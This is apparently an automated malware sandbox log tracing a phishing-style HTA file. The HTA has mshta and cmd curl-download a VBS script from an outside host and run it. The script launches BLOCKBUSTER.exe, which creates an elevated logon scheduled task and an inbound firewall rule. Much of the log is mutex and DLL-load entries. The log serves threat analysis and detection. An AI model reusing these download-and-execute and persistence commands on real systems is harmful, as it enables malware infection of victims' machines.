    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exeMutant created: \Sessions\1\BaseNamedObjects\madToolsMsgHandlerMutex$1308$432c4c
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exeMutant created: \Sessions\1\BaseNamedObjects\BeyondCompare3
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6340:120:WilError_03
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exeMutant created: NULL
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6596:120:WilError_03
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exeMutant created: \Sessions\1\BaseNamedObjects\madExceptSettingsMtx$17d0
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6740:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6996:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6548:120:WilError_03
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exeMutant created: \Sessions\1\BaseNamedObjects\Global\BeyondCompare3
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exeMutant created: \Sessions\1\BaseNamedObjects\MutexNPA_UnitVersioning_6096
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5400:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6428:120:WilError_03
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exeMutant created: \Sessions\1\BaseNamedObjects\Beyond Compare: BE887BC7-16B2-48B5-B618-B3A52A26EC10
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6788:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6284:120:WilError_03
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exeFile created: C:\Users\user\AppData\Local\Temp\BLOCKBUSTER.madExcept
    Source: Yara matchFile source: 0000001D.00000000.1560866719.0000000000401000.00000020.00000001.01000000.00000010.sdmp, type: MEMORY
    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c curl -k -o C:\Users\Public\6720bdf2273b1.vbs https://acess.mailcffemx.com//6720bdf2272bc/6720bdf2273b1.vbs
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
    Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Users\user\Desktop\desktop.ini
    Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: unknownProcess created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\Desktop\#U2749VER CUENTA#U2749_#U2467#U2464#U2465#U2466#U2465#U2466#U2463#U2462.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c curl -k -o C:\Users\Public\6720bdf2273b1.vbs https://acess.mailcffemx.com//6720bdf2272bc/6720bdf2273b1.vbs
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -k -o C:\Users\Public\6720bdf2273b1.vbs https://acess.mailcffemx.com//6720bdf2272bc/6720bdf2273b1.vbs
    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\6720bdf2273b1.vbs
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\6720bdf2273b1.vbs"
    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\6720bdf2273b1.vbs
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\6720bdf2273b1.vbs"
    Source: unknownProcess created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\Desktop\#U2749VER CUENTA#U2749_#U2467#U2464#U2465#U2466#U2465#U2466#U2463#U2462.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c curl -k -o C:\Users\Public\6720bdf2273b1.vbs https://acess.mailcffemx.com//6720bdf2272bc/6720bdf2273b1.vbs
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -k -o C:\Users\Public\6720bdf2273b1.vbs https://acess.mailcffemx.com//6720bdf2272bc/6720bdf2273b1.vbs
    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\6720bdf2273b1.vbs
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\6720bdf2273b1.vbs"
    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\6720bdf2273b1.vbs
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\6720bdf2273b1.vbs"
    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c curl -k -o C:\Users\Public\6720bdf2273b1.vbs https://acess.mailcffemx.com//6720bdf2272bc/6720bdf2273b1.vbs
    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\6720bdf2273b1.vbs
    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\6720bdf2273b1.vbs
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -k -o C:\Users\Public\6720bdf2273b1.vbs https://acess.mailcffemx.com//6720bdf2272bc/6720bdf2273b1.vbs
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\6720bdf2273b1.vbs"
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\6720bdf2273b1.vbs"
    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c curl -k -o C:\Users\Public\6720bdf2273b1.vbs https://acess.mailcffemx.com//6720bdf2272bc/6720bdf2273b1.vbs
    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\6720bdf2273b1.vbs
    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\6720bdf2273b1.vbs
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\_6720bdf2272bc\BLOCKBUSTER.exe "C:\_6720bdf2272bc\BLOCKBUSTER.exe"
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -k -o C:\Users\Public\6720bdf2273b1.vbs https://acess.mailcffemx.com//6720bdf2272bc/6720bdf2273b1.vbs
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Query /TN "BLOCKBUSTER"
    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\6720bdf2273b1.vbs"
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C SCHTASKS /Create /F /RL HIGHEST /TN "BLOCKBUSTER" /TR "C:\_6720bdf2272bc\BLOCKBUSTER.exe" /SC ONLOGON /DELAY 0001:00
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C netsh advfirewall firewall add rule name="BLOCKBUSTER" dir=in action=allow program="C:\_6720bdf2272bc\BLOCKBUSTER.exe" enable=yes profile=any
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Create /F /RL HIGHEST /TN "BLOCKBUSTER" /TR "C:\_6720bdf2272bc\BLOCKBUSTER.exe" /SC ONLOGON /DELAY 0001:00
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="BLOCKBUSTER" dir=in action=allow program="C:\_6720bdf2272bc\BLOCKBUSTER.exe" enable=yes profile=any
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\6720bdf2273b1.vbs"
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\_6720bdf2272bc\BLOCKBUSTER.exe "C:\_6720bdf2272bc\BLOCKBUSTER.exe"
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Query /TN "BLOCKBUSTER"
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C SCHTASKS /Create /F /RL HIGHEST /TN "BLOCKBUSTER" /TR "C:\_6720bdf2272bc\BLOCKBUSTER.exe" /SC ONLOGON /DELAY 0001:00
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C netsh advfirewall firewall add rule name="BLOCKBUSTER" dir=in action=allow program="C:\_6720bdf2272bc\BLOCKBUSTER.exe" enable=yes profile=any
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Create /F /RL HIGHEST /TN "BLOCKBUSTER" /TR "C:\_6720bdf2272bc\BLOCKBUSTER.exe" /SC ONLOGON /DELAY 0001:00
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="BLOCKBUSTER" dir=in action=allow program="C:\_6720bdf2272bc\BLOCKBUSTER.exe" enable=yes profile=any
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srpapi.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msimtf.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: resourcepolicyclient.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textinputframework.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coreuicomponents.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wininet.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dataexchange.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d11.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dcomp.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: twinapi.appcore.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ondemandconnroutehelper.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mswsock.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iphlpapi.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winnsi.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dnsapi.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: rasadhlp.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: fwpuclnt.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: schannel.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mskeyprotect.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntasn1.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msasn1.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dpapi.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptsp.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: rsaenh.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: gpapi.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ncrypt.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ncryptsslp.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: jscript9.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ieframe.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netapi32.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msls31.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d2d1.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dwrite.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d10warp.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxcore.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: vbscript.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: amsi.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mpr.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: scrrun.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sxs.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: edputil.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.staterepositoryps.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: appresolver.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: bcp47langs.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: slc.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sppc.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecorecommonproxystub.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecoreuapcommonproxystub.dll
    Source: C:\Windows\SysWOW64\curl.exeSection loaded: secur32.dll
    Source: C:\Windows\SysWOW64\curl.exeSection loaded: sspicli.dll
    Source: C:\Windows\SysWOW64\curl.exeSection loaded: iphlpapi.dll
    Source: C:\Windows\SysWOW64\curl.exeSection loaded: mswsock.dll
    Source: C:\Windows\SysWOW64\curl.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\SysWOW64\curl.exeSection loaded: dnsapi.dll
    Source: C:\Windows\SysWOW64\curl.exeSection loaded: rasadhlp.dll
    Source: C:\Windows\SysWOW64\curl.exeSection loaded: fwpuclnt.dll
    Source: C:\Windows\SysWOW64\curl.exeSection loaded: schannel.dll
    Source: C:\Windows\SysWOW64\curl.exeSection loaded: mskeyprotect.dll
    Source: C:\Windows\SysWOW64\curl.exeSection loaded: ntasn1.dll
    Source: C:\Windows\SysWOW64\curl.exeSection loaded: ncrypt.dll
    Source: C:\Windows\SysWOW64\curl.exeSection loaded: ncryptsslp.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.storage.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: propsys.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: profapi.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: edputil.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: urlmon.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: iertutil.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.staterepositoryps.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: policymanager.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: msvcp110_win.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wintypes.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: appresolver.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: bcp47langs.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: slc.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: userenv.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sppc.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: onecorecommonproxystub.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: onecoreuapcommonproxystub.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: pcacli.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mpr.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc_os.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msxml3.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msdart.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wininet.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mlang.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ondemandconnroutehelper.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: winhttp.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mswsock.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iphlpapi.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: winnsi.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.storage.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: propsys.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: profapi.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: edputil.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: urlmon.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: iertutil.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.staterepositoryps.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: policymanager.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: msvcp110_win.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wintypes.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: appresolver.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: bcp47langs.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: slc.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: userenv.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sppc.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: onecorecommonproxystub.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: onecoreuapcommonproxystub.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: pcacli.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mpr.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc_os.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srpapi.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msimtf.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: resourcepolicyclient.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textinputframework.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coreuicomponents.dll
